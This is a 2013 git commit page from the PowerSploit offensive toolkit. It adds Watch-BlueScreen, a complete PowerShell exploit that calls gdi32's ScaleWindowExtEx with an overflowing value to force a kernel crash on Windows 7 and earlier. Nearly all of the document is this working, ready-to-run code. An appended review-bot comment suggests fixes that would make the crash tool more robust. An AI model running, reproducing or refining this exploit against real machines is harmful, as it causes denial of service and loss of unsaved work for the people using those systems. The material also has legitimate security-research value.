author | Matt Graeber <mattgraeber@gmail.com> | 2013-05-13 20:01:59 -0400 |
committer | Matt Graeber <mattgraeber@gmail.com> | 2013-05-13 20:01:59 -0400 |
commit | 2a17b8fb56db07519e8e6b7d6819749ce743c882 (patch) | |
tree | 7315164342e510e3ab7b7feccdaab24204a53f3b /CodeExecution | |
parent | f32a572fb971f288d2950af9a6c6d2031a52df2b (diff) | |
download | PowerSploit-2a17b8fb56db07519e8e6b7d6819749ce743c882.tar.gz PowerSploit-2a17b8fb56db07519e8e6b7d6819749ce743c882.zip |
Added Watch-BlueScreen
Causes a blue-screen (bugcheck) to occur.
Diffstat (limited to 'CodeExecution')
-rw-r--r-- | CodeExecution/CodeExecution.psd1 | 2 | ||||
-rw-r--r-- | CodeExecution/Watch-BlueScreen.ps1 | 74 |
2 files changed, 75 insertions, 1 deletions
diff --git a/CodeExecution/CodeExecution.psd1 b/CodeExecution/CodeExecution.psd1
index 180c25e..c6c87f7 100644
--- a/CodeExecution/CodeExecution.psd1
+++ b/CodeExecution/CodeExecution.psd1
@@ -74,7 +74,7 @@ ModuleList = @(@{ModuleName = 'CodeExecution'; ModuleVersion = '1.0.0.0'; GUID =
 # List of all files packaged with this module
 FileList = 'CodeExecution.psm1', 'CodeExecution.psd1', 'Invoke-Shellcode.ps1', 'Invoke-DllInjection.ps1',
- 'Invoke-ShellcodeMSIL.ps1', 'Invoke-ReflectiveDllInjection.ps1', 'Usage.md'
+ 'Invoke-ShellcodeMSIL.ps1', 'Invoke-ReflectiveDllInjection.ps1', 'Watch-BlueScreen.ps1', 'Usage.md'
 # Private data to pass to the module specified in RootModule/ModuleToProcess
 # PrivateData = ''
diff --git a/CodeExecution/Watch-BlueScreen.ps1 b/CodeExecution/Watch-BlueScreen.ps1
new file mode 100644
index 0000000..8523bf2
--- /dev/null
+++ b/CodeExecution/Watch-BlueScreen.ps1 
@@ -0,0 +1,74 @@
+function Watch-BlueScreen
+{
+<#
+.SYNOPSIS
+
+ Cause a blue screen to occur (Windows 7 and below).
+
+ PowerSploit Function: Watch-BlueScreen
+ Author: Matthew Graeber (@mattifestation)
+ Original Research: Tavis Ormandy and Nikita Tarakanov
+ License: BSD 3-Clause
+ Required Dependencies: None
+ Optional Dependencies: None
+
+.NOTES
+
+ Tavis Ormandy documented this technique on 2/3/2013 and Nikita Tarakanov
+ tweeted this technique on 5/13/2013.
+
+.LINK
+
+ https://gist.github.com/taviso/4658638
+ http://blog.cmpxchg8b.com/2013/02/the-other-integer-overflow.html
+ https://twitter.com/NTarakanov/status/334031968465453057
+#>
+
+ try { $Gdi32 = [Gdi32] } catch [Management.Automation.RuntimeException]
+ {
+ $DynAssembly = New-Object System.Reflection.AssemblyName('BSOD')
+ $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, 'Run')
+ $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('BSOD', $False)
+ $TypeBuilder = $ModuleBuilder.DefineType('Gdi32', 'Public, Class')
+
+ $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
+ $SetLastError = [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError')
+ $SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder( $DllImportConstructor, @('ntdll.dll'),
+ [Reflection.FieldInfo[]]@($SetLastError), @($true))
+
+ $TypeBuilder.DefinePInvokeMethod( 'CreateCompatibleDC',
+ 'Gdi32.dll',
+ 'Public, Static',
+ 'Standard',
+ [IntPtr],
+ @([IntPtr]),
+ 'Winapi',
+ 'Auto' ).SetCustomAttribute($SetLastErrorCustomAttribute)
+
+ $TypeBuilder.DefinePInvokeMethod( 'SetLayout',
+ 'Gdi32.dll',
+ 'Public, Static',
+ 'Standard',
+ [UInt32],
+ @([IntPtr], [UInt32]),
+ 'Winapi',
+ 'Auto' ) | Out-Null
+
+ $TypeBuilder.DefinePInvokeMethod( 'ScaleWindowExtEx',
+ 'Gdi32.dll',
+ 'Public, Static',
+ 'Standard',
+ [Bool],
+ @([IntPtr], [Int32], [Int32], [Int32], [Int32], [IntPtr]),
+ 'Winapi',
+ 'Auto' ) | Out-Null
+
+ 
$Gdi32 = $TypeBuilder.CreateType()
+ }
+
+ $LAYOUT_RTL = 1
+
+ $DC = $Gdi32::CreateCompatibleDC([IntPtr]::Zero)
+ $Gdi32::SetLayout($DC, $LAYOUT_RTL) | Out-Null
+ $Gdi32::ScaleWindowExtEx($DC, [Int32]::MinValue, -1, 1, 1, [IntPtr]::Zero) | Out-Null
+}
\ No newline at end of file |
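Review bot: The DllImportAttribute attached to CreateCompatibleDC is built with `@('ntdll.dll')` while the DefinePInvokeMethod call two lines later targets 'Gdi32.dll', so the attribute contradicts the P/Invoke it decorates; it should read `@('Gdi32.dll')`, and since nothing in the function reads the last Win32 error, the SetLastError attribute together with $DllImportConstructor and $SetLastError could simply be dropped. The `try { $Gdi32 = [Gdi32] } catch` probe keys only on the bare type name 'Gdi32', so any other dynamic assembly already loaded in the session that defines a 'Gdi32' type lacking SetLayout or ScaleWindowExtEx is reused as-is and the static calls at the bottom then fail; probing for the specific member (e.g. `[Gdi32].GetMethod('ScaleWindowExtEx')`) or using a less generic type name would avoid that collision. The comment-based help has .SYNOPSIS, .NOTES and .LINK but no .DESCRIPTION or .EXAMPLE, and because both SetLayout and ScaleWindowExtEx results are piped to Out-Null the caller gets no indication whether either call succeeded, which the help should state. Watch-BlueScreen is contained entirely within this hunk, displayed across two physical lines.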